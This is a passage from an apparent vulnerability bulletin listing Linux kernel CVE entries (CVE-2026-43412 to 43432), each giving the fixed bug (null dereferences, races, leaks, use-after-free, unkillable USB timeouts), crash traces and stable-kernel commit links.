00000000000000d0 [ 48.366198] x20: ffff00009ba6c338 x19: ffff00009ba6c338 x18: 00000000ffffffff [ 48.373528] x17: 000000040044ffff x16: ffffa31d4ae6dca8 x15: 072007740775076f [ 48.380853] x14: 0765076d07690774 x13: 00313a323a656369 x12: 767265733a637673 [ 48.388182] x11: 00000000000003f9 x10: ffffa31d4c7dea98 x9 : 0000000000000001 [ 48.395519] x8 : ffff00009a2aadc0 x7 : 0000000000000003 x6 : 0000000000000000 [ 48.402854] x5 : 0000000000000 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43412 | https://git.kernel.org/stable/c/94bda21adb2a51f69366b847b4d80dfe50bd9fb9 https://git.kernel.org/stable/c/a8e9cab16771b15160465783507496dc83742d8e https://git.kernel.org/stable/c/0da170b9e600da6930cfb8352e4cc036db3b6159 https://git.kernel.org/stable/c/22b05abb17e3c6ef45035141fe3d26f815ff9d30 https://git.kernel.org/stable/c/897f32cab7945f4662a50b3841ba31c6c3204876 https://git.kernel.org/stable/c/d6db827b430bdcca3976cebca7bd69cca03cde2c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: hisi_sas: Fix NULL pointer exception during user_scan() user_scan() invokes updated sas_user_scan() for channel 0, and if successful, iteratively scans remaining channels (1 to shost->max_channel) via scsi_scan_host_selected() in commit 37c4e72b0651 ("scsi: Fix sas_user_scan() to handle wildcard and multi-channel scans"). However, hisi_sas supports only one channel, and the current value of max_channel is 1. sas_user_scan() for channel 1 will trigger the following NULL pointer exception: [ 441.554662] Unable to handle kernel NULL pointer dereference at virtual address 00000000000008b0 [ 441.554699] Mem abort info: [ 441.554710] ESR = 0x0000000096000004 [ 441.554718] EC = 0x25: DABT (current EL), IL = 32 bits [ 441.554723] SET = 0, FnV = 0 [ 441.554726] EA = 0, S1PTW = 0 [ 441.554730] FSC = 0x04: level 0 translation fault [ 441.554735] Data abort info: [ 441.554737] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 441.554742] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 441.554747] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 441.554752] user pgtable: 4k pages, 48-bit VAs, pgdp=00000828377a6000 [ 441.554757] [00000000000008b0] pgd=0000000000000000, p4d=0000000000000000 [ 441.554769] Internal error: Oops: 0000000096000004 [#1] SMP [ 441.629589] Modules linked in: arm_spe_pmu arm_smmuv3_pmu tpm_tis_spi hisi_uncore_sllc_pmu hisi_uncore_pa_pmu hisi_uncore_l3c_pmu hisi_uncore_hha_pmu hisi_uncore_ddrc_pmu hisi_uncore_cpa_pmu hns3_pmu hisi_ptt hisi_pcie_pmu tpm_tis_core spidev spi_hisi_sfc_v3xx hisi_uncore_pmu spi_dw_mmio fuse hclge hclge_common hisi_sec2 hisi_hpre hisi_zip hisi_qm hns3 hisi_sas_v3_hw sm3_ce sbsa_gwdt hnae3 hisi_sas_main uacce hisi_dma i2c_hisi dm_mirror dm_region_hash dm_log dm_mod [ 441.670819] CPU: 46 UID: 0 PID: 6994 Comm: bash Kdump: loaded Not tainted 7.0.0-rc2+ #84 PREEMPT [ 441.691327] pstate: 81400009 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 441.698277] pc : sas_find_dev_by_rphy+0x44/0x118 [ 441.702896] lr : sas_find_dev_by_rphy+0x3c/0x118 [ 441.707502] sp : ffff80009abbba40 [ 441.710805] x29: ffff80009abbba40 x28: ffff082819a40008 x27: ffff082810c37c08 [ 441.717930] x26: ffff082810c37c28 x25: ffff082819a40290 x24: ffff082810c37c00 [ 441.725054] x23: 0000000000000000 x22: 0000000000000001 x21: ffff082819a40000 [ 441.732179] x20: ffff082819a40290 x19: 0000000000000000 x18: 0000000000000020 [ 441.739304] x17: 0000000000000000 x16: ffffb5dad6bda690 x15: 00000000ffffffff [ 441.746428] x14: ffff082814c3b26c x13: 00000000ffffffff x12: ffff082814c3b26a [ 441.753553] x11: 00000000000000c0 x10: 000000000000003a x9 : ffffb5dad5ea94f4 [ 441.760678] x8 : 000000000000003a x7 : ffff80009abbbab0 x6 : 0000000000000030 [ 441.767802] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 [ 441.774926] x2 : ffff08280f35a300 x1 : ffffb5dad7127180 x0 : 0000000000000000 [ 441.782053] Call trace: [ 441.784488] sas_find_dev_by_rphy+0x44/0x118 (P) [ 441.789095] sas_target_alloc+0x24/0xb0 [ 441.792920] scsi_alloc_target+0x290/0x330 [ 441.797010] __scsi_scan_target+0x88/0x258 [ 441.801096] scsi_scan_channel+0x74/0xb8 [ 441.805008] scsi_scan_host_selected+0x170/0x188 [ 441.809615] sas_user_scan+0xfc/0x148 [ 441.813267] store_scan+0x10c/0x180 [ 441.816743] dev_attr_store+0x20/0x40 [ 441.820398] sysfs_kf_write+0x84/0xa8 [ 441.824054] kernfs_fop_write_iter+0x130/0x1c8 [ 441.828487] vfs_write+0x2c0/0x370 [ 441.831880] ksys_write+0x74/0x118 [ 441.835271] __arm64_sys_write+0x24/0x38 [ 441.839182] invoke_syscall+0x50/0x120 [ 441.842919] el0_svc_common.constprop.0+0xc8/0xf0 [ 441.847611] do_el0_svc+0x24/0x38 [ 441.850913] el0_svc+0x38/0x158 [ 441.854043] el0t_64_sync_handler+0xa0/0xe8 [ 441.858214] el0t_64_sync+0x1ac/0x1b0 [ 441.861865] Code: aa1303e0 97ff70a8 34ffff80 d10a4273 (f9445a75) [ 441.867946] ---[ end trace 0000000000000000 ]--- Therefore ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43413 | https://git.kernel.org/stable/c/70c78429ef383e35f9c58848994aeeac8083ae35 https://git.kernel.org/stable/c/40119a21d9769bf8fdab5c93c6c878296e628abf https://git.kernel.org/stable/c/21a13db8d449b9c7eda4471da7f12417602dbbc7 https://git.kernel.org/stable/c/beadac156610a4f3bb15cb7bb4b07b6ac06f6567 https://git.kernel.org/stable/c/8ddc0c26916574395447ebf4cff684314f6873a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Fix SError in ufshcd_rtc_work() during UFS suspend In __ufshcd_wl_suspend(), cancel_delayed_work_sync() is called to cancel the UFS RTC work, but it is placed after ufshcd_vops_suspend(hba, pm_op, POST_CHANGE). This creates a race condition where ufshcd_rtc_work() can still be running while ufshcd_vops_suspend() is executing. When UFSHCD_CAP_CLK_GATING is not supported, the condition !hba->clk_gating.active_reqs is always true, causing ufshcd_update_rtc() to be executed. Since ufshcd_vops_suspend() typically performs clock gating operations, executing ufshcd_update_rtc() at that moment triggers an SError. The kernel panic trace is as follows: Kernel panic - not syncing: Asynchronous SError Interrupt Call trace: dump_backtrace+0xec/0x128 show_stack+0x18/0x28 dump_stack_lvl+0x40/0xa0 dump_stack+0x18/0x24 panic+0x148/0x374 nmi_panic+0x3c/0x8c arm64_serror_panic+0x64/0x8c do_serror+0xc4/0xc8 el1h_64_error_handler+0x34/0x4c el1h_64_error+0x68/0x6c el1_interrupt+0x20/0x58 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x68/0x6c ktime_get+0xc4/0x12c ufshcd_mcq_sq_stop+0x4c/0xec ufshcd_mcq_sq_cleanup+0x64/0x1dc ufshcd_clear_cmd+0x38/0x134 ufshcd_issue_dev_cmd+0x298/0x4d0 ufshcd_exec_dev_cmd+0x1a4/0x1c4 ufshcd_query_attr+0xbc/0x19c ufshcd_rtc_work+0x10c/0x1c8 process_scheduled_works+0x1c4/0x45c worker_thread+0x32c/0x3e8 kthread+0x120/0x1d8 ret_from_fork+0x10/0x20 Fix this by moving cancel_delayed_work_sync() before the call to ufshcd_vops_suspend(hba, pm_op, PRE_CHANGE), ensuring the UFS RTC work is fully completed or cancelled at that point. | 2026-05-08 | not yet calculated | CVE-2026-43415 | https://git.kernel.org/stable/c/a6a894413b043704b77a6294c379c93b1477e48d https://git.kernel.org/stable/c/2fcc2fc21cae7a0cbe73053f7fc70680ce2a7f69 https://git.kernel.org/stable/c/b17211b512cbf0e07de27e1932428ee6c20df910 https://git.kernel.org/stable/c/c387a8f1d3713f6b0415ece8485042d0f134b91a https://git.kernel.org/stable/c/b0bd84c39289ef6a6c3827dd52c875659291970a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc, perf: Check that current->mm is alive before getting user callchain It may happen that mm is already released, which leads to kernel panic. This adds the NULL check for current->mm, similarly to commit 20afc60f892d ("x86, perf: Check that current->mm is alive before getting user callchain"). I was getting this panic when running a profiling BPF program (profile.py from bcc-tools): [26215.051935] Kernel attempted to read user page (588) - exploit attempt? (uid: 0) [26215.051950] BUG: Kernel NULL pointer dereference on read at 0x00000588 [26215.051952] Faulting instruction address: 0xc00000000020fac0 [26215.051957] Oops: Kernel access of bad area, sig: 11 [#1] [...] [26215.052049] Call Trace: [26215.052050] [c000000061da6d30] [c00000000020fc10] perf_callchain_user_64+0x2d0/0x490 (unreliable) [26215.052054] [c000000061da6dc0] [c00000000020f92c] perf_callchain_user+0x1c/0x30 [26215.052057] [c000000061da6de0] [c0000000005ab2a0] get_perf_callchain+0x100/0x360 [26215.052063] [c000000061da6e70] [c000000000573bc8] bpf_get_stackid+0x88/0xf0 [26215.052067] [c000000061da6ea0] [c008000000042258] bpf_prog_16d4ab9ab662f669_do_perf_event+0xf8/0x274 [...] In addition, move storing the top-level stack entry to generic perf_callchain_user to make sure the top-level entry is always captured, even if current->mm is NULL. [Maddy: fixed message to avoid checkpatch format style error] | 2026-05-08 | not yet calculated | CVE-2026-43416 | https://git.kernel.org/stable/c/98074e16742ae87fb82e234b419783c5ffc9baea https://git.kernel.org/stable/c/7e5f60b8cfc02a2b23a40a5f5fd2fa81d010e737 https://git.kernel.org/stable/c/e9bbfb4bfa86c6b5515b868d6982ac60505d7e39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/mmcid: Handle vfork()/CLONE_VM correctly Matthieu and Jiri reported stalls where a task endlessly loops in mm_get_cid() when scheduling in. It turned out that the logic which handles vfork()'ed tasks is broken. It is invoked when the number of tasks associated to a process is smaller than the number of MMCID users. It then walks the task list to find the vfork()'ed task, but accounts all the already processed tasks as well. If that double processing brings the number of to be handled tasks to 0, the walk stops and the vfork()'ed task's CID is not fixed up. As a consequence a subsequent schedule in fails to acquire a (transitional) CID and the machine stalls. Cure this by removing the accounting condition and making the fixup always walk the full task list if it could not find the exact number of users in the process' thread list. | 2026-05-08 | not yet calculated | CVE-2026-43417 | https://git.kernel.org/stable/c/e6761cdce78a8919a537989afb6aaf6881469f83 https://git.kernel.org/stable/c/28b5a1395036d6c7a6c8034d85ad3d7d365f192c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/mmcid: Prevent CID stalls due to concurrent forks A newly forked task is accounted as MMCID user before the task is visible in the process' thread list and the global task list. This creates the following problem: CPU1 CPU2 fork() sched_mm_cid_fork(tnew1) tnew1->mm.mm_cid_users++; tnew1->mm_cid.cid = getcid() -> preemption fork() sched_mm_cid_fork(tnew2) tnew2->mm.mm_cid_users++; // Reaches the per CPU threshold mm_cid_fixup_tasks_to_cpus() for_each_other(current, p) .... As tnew1 is not visible yet, this fails to fix up the already allocated CID of tnew1. As a consequence a subsequent schedule in might fail to acquire a (transitional) CID and the machine stalls. Move the invocation of sched_mm_cid_fork() after the new task becomes visible in the thread and the task list to prevent this. This also makes it symmetrical vs. exit() where the task is removed as CID user before the task is removed from the thread and task lists. | 2026-05-08 | not yet calculated | CVE-2026-43418 | https://git.kernel.org/stable/c/f0189d49282e0458f3a737bd486c1ec048148f66 https://git.kernel.org/stable/c/b2e48c429ec54715d16fefa719dd2fbded2e65be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix memory leaks in ceph_mdsc_build_path() Add __putname() calls to error code paths that did not free the "path" pointer obtained by __getname(). If ownership of this pointer is not passed to the caller via path_info.path, the function must free it before returning. | 2026-05-08 | not yet calculated | CVE-2026-43419 | https://git.kernel.org/stable/c/657dc653b06a3cc0282aea447a3f137fa94066a4 https://git.kernel.org/stable/c/5895d0164c84d7fec6abc198920c257f55c51899 https://git.kernel.org/stable/c/097cd68f46686391a98f2618188f0cb7b7570de2 https://git.kernel.org/stable/c/13b8b9d6f59ef17fb96c298c3a0d62a8306950cc https://git.kernel.org/stable/c/040d159a45ded7f33201421a81df0aa2a86e5a0b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix i_nlink underrun during async unlink During async unlink, we drop the `i_nlink` counter before we receive the completion (that will eventually update the `i_nlink`) because "we assume that the unlink will succeed". That is not a bad idea, but it races against deletions by other clients (or against the completion of our own unlink) and can lead to an underrun which emits a WARNING like this one: WARNING: CPU: 85 PID: 25093 at fs/inode.c:407 drop_nlink+0x50/0x68 Modules linked in: CPU: 85 UID: 3221252029 PID: 25093 Comm: php-cgi8.1 Not tainted 6.14.11-cm4all1-ampere #655 Hardware name: Supermicro ARS-110M-NR/R12SPD-A, BIOS 1.1b 10/17/2023 pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : drop_nlink+0x50/0x68 lr : ceph_unlink+0x6c4/0x720 sp : ffff80012173bc90 x29: ffff80012173bc90 x28: ffff086d0a45aaf8 x27: ffff0871d0eb5680 x26: ffff087f2a64a718 x25: 0000020000000180 x24: 0000000061c88647 x23: 0000000000000002 x22: ffff07ff9236d800 x21: 0000000000001203 x20: ffff07ff9237b000 x19: ffff088b8296afc0 x18: 00000000f3c93365 x17: 0000000000070000 x16: ffff08faffcbdfe8 x15: ffff08faffcbdfec x14: 0000000000000000 x13: 45445f65645f3037 x12: 34385f6369706f74 x11: 0000a2653104bb20 x10: ffffd85f26d73290 x9 : ffffd85f25664f94 x8 : 00000000000000c0 x7 : 0000000000000000 x6 : 0000000000000002 x5 : 0000000000000081 x4 : 0000000000000481 x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff08727d3f91e8 Call trace: drop_nlink+0x50/0x68 (P) vfs_unlink+0xb0/0x2e8 do_unlinkat+0x204/0x288 __arm64_sys_unlinkat+0x3c/0x80 invoke_syscall.constprop.0+0x54/0xe8 do_el0_svc+0xa4/0xc8 el0_svc+0x18/0x58 el0t_64_sync_handler+0x104/0x130 el0t_64_sync+0x154/0x158 In ceph_unlink(), a call to ceph_mdsc_submit_request() submits the CEPH_MDS_OP_UNLINK to the MDS, but does not wait for completion. Meanwhile, between this call and the following drop_nlink() call, a worker thread may process a CEPH_CAP_OP_IMPORT, CEPH_CAP_OP_GRANT or just a CEPH_MSG_CLIENT_REPLY (the latter of which could be our own completion). These will lead to a set_nlink() call, updating the `i_nlink` counter to the value received from the MDS. If that new `i_nlink` value happens to be zero, it is illegal to decrement it further. But that is exactly what ceph_unlink() will do then. The WARNING can be reproduced this way: 1. Force async unlink; only the async code path is affected. Having no real clue about Ceph internals, I was unable to find out why the MDS wouldn't give me the "Fxr" capabilities, so I patched get_caps_for_async_unlink() to always succeed. (Note that the WARNING dump above was found on an unpatched kernel, without this kludge - this is not a theoretical bug.) 2. Add a sleep call after ceph_mdsc_submit_request() so the unlink completion gets handled by a worker thread before drop_nlink() is called. This guarantees that the `i_nlink` is already zero before drop_nlink() runs. The solution is to skip the counter decrement when it is already zero, but doing so without a lock is still racy (TOCTOU). Since ceph_fill_inode() and handle_cap_grant() both hold the `ceph_inode_info.i_ceph_lock` spinlock while set_nlink() runs, this seems like the proper lock to protect the `i_nlink` updates. I found prior art in NFS and SMB (using `inode.i_lock`) and AFS (using `afs_vnode.cb_lock`). All three have the zero check as well. | 2026-05-08 | not yet calculated | CVE-2026-43420 | https://git.kernel.org/stable/c/9b31e88ac5623d15c8bc46f69dfe1d3b43a8f67c https://git.kernel.org/stable/c/6d5fd8bb574bef039eb3b738e523870433a2aeb9 https://git.kernel.org/stable/c/fcc477a6e8856c8a42b3c9e171724d8d6dfadd06 https://git.kernel.org/stable/c/b3f5513141ecc6b277a8f7b7efe58a0cf9a5e859 https://git.kernel.org/stable/c/aedd29386b23f3e1e6818943e11abfff2953732f https://git.kernel.org/stable/c/7db008e85a5d17b64bc5390b828bf457ae91a415 https://git.kernel.org/stable/c/8975b85b0d45ca811ace6fac5907652f2310e5ac https://git.kernel.org/stable/c/ce0123cbb4a40a2f1bbb815f292b26e96088639f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_ncm: Fix net_device lifecycle with device_move The network device outlived its parent gadget device during disconnection, resulting in dangling sysfs links and null pointer dereference problems. A prior attempt to solve this by removing SET_NETDEV_DEV entirely [1] was reverted due to power management ordering concerns and a NO-CARRIER regression. A subsequent attempt to defer net_device allocation to bind [2] broke 1:1 mapping between function instance and network device, making it impossible for configfs to report the resolved interface name. This results in a regression where the DHCP server fails on pmOS. Use device_move to reparent the net_device between the gadget device and /sys/devices/virtual/ across bind/unbind cycles. This preserves the network interface across USB reconnection, allowing the DHCP server to retain its binding. Introduce gether_attach_gadget()/gether_detach_gadget() helpers and use __free(detach_gadget) macro to undo attachment on bind failure. The bind_count ensures device_move executes only on the first bind. [1] https://lore.kernel.org/lkml/f2a4f9847617a0929d62025748384092e5f35cce.camel@crapouillou.net/ [2] https://lore.kernel.org/linux-usb/795ea759-7eaf-4f78-81f4-01ffbf2d7961@ixit.cz/ | 2026-05-08 | not yet calculated | CVE-2026-43421 | https://git.kernel.org/stable/c/93f116c3393a22acab96ad1bef12b2572eb80ca4 https://git.kernel.org/stable/c/e584cb58a2ea7ff4d3a4bc43d5ca512ed3ecb77d https://git.kernel.org/stable/c/85acaba2f42b557499bab3608307f17bf13beb69 https://git.kernel.org/stable/c/ec35c1969650e7cb6c8a91020e568ed46e3551b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: legacy: ncm: Fix NPE in gncm_bind Commit 56a512a9b410 ("usb: gadget: f_ncm: align net_device lifecycle with bind/unbind") deferred the allocation of the net_device. This change leads to a NULL pointer dereference in the legacy NCM driver as it attempts to access the net_device before it's fully instantiated. Store the provided qmult, host_addr, and dev_addr into the struct ncm_opts->net_opts during gncm_bind(). These values will be properly applied to the net_device when it is allocated and configured later in the binding process by the NCM function driver. | 2026-05-08 | not yet calculated | CVE-2026-43422 | https://git.kernel.org/stable/c/be5738d19bed244ede84da45bc45395bcb1d99e0 https://git.kernel.org/stable/c/b23e86a3a15803c3dcb24701285f73e65099fdf9 https://git.kernel.org/stable/c/fde0634ad9856b3943a2d1a8cc8de174a63ac840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_ncm: Fix atomic context locking issue The ncm_set_alt function was holding a mutex to protect against races with configfs, which invokes the might-sleep function inside an atomic context. Remove the struct net_device pointer from the f_ncm_opts structure to eliminate the contention. The connection state is now managed by a new boolean flag to preserve the use-after-free fix from commit 6334b8e4553c ("usb: gadget: f_ncm: Fix UAF ncm object at re-bind after usb ep transport error"). BUG: sleeping function called from invalid context Call Trace: dump_stack_lvl+0x83/0xc0 dump_stack+0x14/0x16 __might_resched+0x389/0x4c0 __might_sleep+0x8e/0x100 ... __mutex_lock+0x6f/0x1740 ... ncm_set_alt+0x209/0xa40 set_config+0x6b6/0xb40 composite_setup+0x734/0x2b40 ... | 2026-05-08 | not yet calculated | CVE-2026-43423 | https://git.kernel.org/stable/c/e533a44fb1b337d14f772585b67328bee2e0b5e3 https://git.kernel.org/stable/c/e95120b4b95ef1c16d8e94e201ae89f5e59e2612 https://git.kernel.org/stable/c/0d6c8144ca4d93253de952a5ea0028c19ed7ab68 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_tcm: Fix NULL pointer dereferences in nexus handling The `tpg->tpg_nexus` pointer in the USB Target driver is dynamically managed and tied to userspace configuration via ConfigFS. It can be NULL if the USB host sends requests before the nexus is fully established or immediately after it is dropped. Currently, functions like `bot_submit_command()` and the data transfer paths retrieve `tv_nexus = tpg->tpg_nexus` and immediately dereference `tv_nexus->tvn_se_sess` without any validation. If a malicious or misconfigured USB host sends a BOT (Bulk-Only Transport) command during this race window, it triggers a NULL pointer dereference, leading to a kernel panic (local DoS). This exposes an inconsistent API usage within the module, as peer functions like `usbg_submit_command()` and `bot_send_bad_response()` correctly implement a NULL check for `tv_nexus` before proceeding. Fix this by bringing consistency to the nexus handling. Add the missing `if (!tv_nexus)` checks to the vulnerable BOT command and request processing paths, aborting the command gracefully with an error instead of crashing the system. | 2026-05-08 | not yet calculated | CVE-2026-43424 | https://git.kernel.org/stable/c/b9b26d7f3aa288cfa54a7bc68612bab1f153f156 https://git.kernel.org/stable/c/2a2ef846a54a06c33b5c2d4b0d918583e1e7c0b7 https://git.kernel.org/stable/c/d146f27758049fa55ae4c53785a852d3cf7a18d6 https://git.kernel.org/stable/c/f962ca3b020e13d6714f27e8c36fe742441c58d1 https://git.kernel.org/stable/c/679d9535aeb15c10bce89c44102004b96624d706 https://git.kernel.org/stable/c/3d309b37633c4a847fc149939a2c9576f1aa1065 https://git.kernel.org/stable/c/b9fde507355342a2d64225d582dc8b98ff5ecb19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: image: mdc800: kill download URB on timeout mdc800_device_read() submits download_urb and waits for completion. If the timeout fires and the device has not responded, the function returns without killing the URB, leaving it active. A subsequent read() resubmits the same URB while it is still in-flight, triggering the WARN in usb_submit_urb(): "URB submitted while active" Check the return value of wait_event_timeout() and kill the URB if it indicates timeout, ensuring the URB is complete before its status is inspected or the URB is resubmitted. Similar to - commit 372c93131998 ("USB: yurex: fix control-URB timeout handling") - commit b98d5000c505 ("media: rc: iguanair: handle timeouts") | 2026-05-08 | not yet calculated | CVE-2026-43425 | https://git.kernel.org/stable/c/9fa5a49760979ba016506fe292a431c8b83f043e https://git.kernel.org/stable/c/15536f6c15f48037a1672cbdea53266d67861ff6 https://git.kernel.org/stable/c/9bf877cc67309b2a063b0087c3ad8585fb11cec3 https://git.kernel.org/stable/c/155f471e38aa516f6c58c2ae03ca3dc222fa2fdb https://git.kernel.org/stable/c/d4a400a6a4c4d49f77a04a3f401df5ae1a10657c https://git.kernel.org/stable/c/b7fed917f84e484e06c5e9926746d0b524e3a93e https://git.kernel.org/stable/c/cc7398447810c9450c90d092efe9997569f8d96f https://git.kernel.org/stable/c/1be3b77de4eb89af8ae2fd6610546be778e25589 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: renesas_usbhs: fix use-after-free in ISR during device removal In usbhs_remove(), the driver frees resources (including the pipe array) while the interrupt handler (usbhs_interrupt) is still registered. If an interrupt fires after usbhs_pipe_remove() but before the driver is fully unbound, the ISR may access freed memory, causing a use-after-free. Fix this by calling devm_free_irq() before freeing resources. This ensures the interrupt handler is both disabled and synchronized (waits for any running ISR to complete) before usbhs_pipe_remove() is called. | 2026-05-08 | not yet calculated | CVE-2026-43426 | https://git.kernel.org/stable/c/c7012fc73dab4829404fedeeaa8531f12ac8545f https://git.kernel.org/stable/c/51afaf919bbaacdd9cc9e146033ae0a743a42dd7 https://git.kernel.org/stable/c/1899edac312ef17a7234851686e8a703f56d0a84 https://git.kernel.org/stable/c/9c6159d5b72d5fc265cce5da04f27d730b552e69 https://git.kernel.org/stable/c/6287e0c01ccb818e7214f88d885ffb7c9e81b0e0 https://git.kernel.org/stable/c/0b7d11fd6e742ecc0b1eca44b4f0b93140c74bae https://git.kernel.org/stable/c/6ffe44f022c95b1b29c691d2169c5abc046f7580 https://git.kernel.org/stable/c/3cbc242b88c607f55da3d0d0d336b49bf1e20412 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: class: cdc-wdm: fix reordering issue in read code path Quoting the bug report: Due to compiler optimization or CPU out-of-order execution, the desc->length update can be reordered before the memmove. If this happens, wdm_read() can see the new length and call copy_to_user() on uninitialized memory. This also violates LKMM data race rules [1]. Fix it by using WRITE_ONCE and memory barriers. | 2026-05-08 | not yet calculated | CVE-2026-43427 | https://git.kernel.org/stable/c/638328ca9c17ae6511ad62198c57bae32ffa3c91 https://git.kernel.org/stable/c/170e8daca24da6edb4be82ab01abf44e87af387b https://git.kernel.org/stable/c/c8fa96ed021923dae147bcd9f9205b8df7b82360 https://git.kernel.org/stable/c/4ee3062bf2c9a722afef429826e8607eaf3fc6a0 https://git.kernel.org/stable/c/276aef0fd2b92f41b920ac891c72cadeee957934 https://git.kernel.org/stable/c/67ed312124bb1b61858778ac0b985b48961c862a https://git.kernel.org/stable/c/e3c874b05901dc519054b5107d16620e6d2b5fea https://git.kernel.org/stable/c/8df672bfe3ec2268c2636584202755898e547173 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: core: Limit the length of unkillable synchronous timeouts The usb_control_msg(), usb_bulk_msg(), and usb_interrupt_msg() APIs in usbcore allow unlimited timeout durations. And since they use uninterruptible waits, this leaves open the possibility of hanging a task for an indefinitely long time, with no way to kill it short of unplugging the target device. To prevent this sort of problem, enforce a maximum limit on the length of these unkillable timeouts. The limit chosen here, somewhat arbitrarily, is 60 seconds. On many systems (although not all) this is short enough to avoid triggering the kernel's hung-task detector. In addition, clear up the ambiguity of negative timeout values by treating them the same as 0, i.e., using the maximum allowed timeout. | 2026-05-08 | not yet calculated | CVE-2026-43428 | https://git.kernel.org/stable/c/4e86f5b79e62ded7e3c3ebd688cf5775e618148a https://git.kernel.org/stable/c/06d2bbc4c66c6b0e8a43728c4949026026a5be67 https://git.kernel.org/stable/c/6c62935670acdbb7687ced20494923b66fbb0367 https://git.kernel.org/stable/c/659c0c7d50a4b0f6aa197c4c098cfd91daf63862 https://git.kernel.org/stable/c/24b31a227f679a942d820840a4dea7f0c09a387f https://git.kernel.org/stable/c/64f3d75633aedc12bdff220e9a4337177430bd9d https://git.kernel.org/stable/c/2d34cb4d1d6283b4be9c78f4a83ed6956d3069ec https://git.kernel.org/stable/c/1015c27a5e1a63efae2b18a9901494474b4d1dc3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: usbtmc: Use usb_bulk_msg_killable() with user-specified timeouts The usbtmc driver accepts timeout values specified by the user in an ioctl command, and uses these timeouts for some usb_bulk_msg() calls. Since the user can specify arbitrarily long timeouts and usb_bulk_msg() uses unkillable waits, call usb_bulk_msg_killable() instead to avoid the possibility of the user hanging a kernel thread indefinitely. | 2026-05-08 | not yet calculated | CVE-2026-43429 | https://git.kernel.org/stable/c/e14a0dcdf468c3ad616bb06696c7c64c36e736d8 https://git.kernel.org/stable/c/7fa72c369c23c27d1f64883c1e276af950557fb1 https://git.kernel.org/stable/c/72c0a063489be183cfb99e7050aaef503bdb6449 https://git.kernel.org/stable/c/39bd4097292fd8564cf2cfba9356f8ab11e38d12 https://git.kernel.org/stable/c/0535f84cb94c9d8bcba0a2a5b3fac81b7d97235d https://git.kernel.org/stable/c/6cb7dc91f057dd8ce44f6caa2995d8e22784ed0a https://git.kernel.org/stable/c/d4f1c45bdff3f393f9ab7e76795901c442b9eb76 https://git.kernel.org/stable/c/7784caa413a89487dd14dd5c41db8753483b2acb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: yurex: fix race in probe The bbu member of the descriptor must be set to the value standing for uninitialized values before the URB whose completion handler sets bbu is submitted. Otherwise there is a window during which probing can overwrite already retrieved data. | 2026-05-08 | not yet calculated | CVE-2026-43430 | https://git.kernel.org/stable/c/a7934d7202a39c3160aa30521c382c7b744ae4a2 https://git.kernel.org/stable/c/a8b3b3d730acea1640bc89465f2832cf06a1e13a https://git.kernel.org/stable/c/687d26d43a5aaf44323ce7d601cf242bb87e9559 https://git.kernel.org/stable/c/939e3d17b843b0bae70467fef4481069d73c8520 https://git.kernel.org/stable/c/3cec135415a89723e2d38e1c8cc5098203355965 https://git.kernel.org/stable/c/a41d3d9202e951995cfac6248c565423079c71fa https://git.kernel.org/stable/c/af83e92c329f11139d5eea2b5b7b83c26c3f67e7 https://git.kernel.org/stable/c/7a875c09899ba0404844abfd8f0d54cdc481c151 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xhci: Fix NULL pointer dereference when reading portli debugfs files Michal reported and debugged a NULL pointer dereference bug in the recently added portli debugfs files. The Oops is caused when there are more port registers counted in xhci->max_ports than ports reported by Supported Protocol capabilities. This is possible if max_ports is more than the maximum port number, or if there are gaps between ports of different speeds in the 'Supported Protocol' capabilities. In such cases port->rhub will be NULL so we can't reach xhci behind it. Add an explicit NULL check for this case, and print portli in hex without dereferencing port->rhub. | 2026-05-08 | not yet calculated | CVE-2026-43431 | https://git.kernel.org/stable/c/9c8bef223c6e991276188d30d74bdb2cbd8be652 https://git.kernel.org/stable/c/ae4ff9dead5efa2025eddfcdb29411432bf40a7c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: xhci: Fix memory leak in xhci_disable_slot() xhci_alloc_command() allocates a command structure and, when the second argument is true, also allocates a completion structure. Currently, the error handling path in xhci_disable_slot() only frees the command structure using kfree(), causing the completion structure to leak. Use xhci_free_command() instead of kfree(). xhci_free_command() correctly frees both the command structure and the associated completion structure. Since the command structure is allocated with zero-initialization, command->in_ctx is NULL and will not be erroneously freed by xhci_free_command(). This bug was found using an experimental static analysis tool we are developing. The tool is based on the LLVM framework and is specifically designed to detect memory management issues. It is currently under active development and not yet publicly available, but we plan to open-source it after our research is published. The bug was originally detected on v6.13-rc1 using our static analysis tool, and we have verified that the issue persists in the latest mainline kernel. We performed build testing on x86_64 with allyesconfig using GCC=11.4.0. Since triggering these error paths in xhci_disable_slot() requires specific hardware conditions or abnormal state, we were unable to construct a test case to reliably trigger these specific error paths at runtime. | 2026-05-08 | not yet calculated | CVE-2026-43432 | 